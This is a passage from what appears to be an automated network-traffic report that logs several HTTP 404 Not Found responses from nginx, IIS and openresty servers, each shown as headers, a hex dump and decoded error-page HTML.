6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:07:38 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:07:33 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:07:39 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:07:40 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:07:40 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:07:44 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:07:44 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:07:48 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:07:49 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:07:59 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a 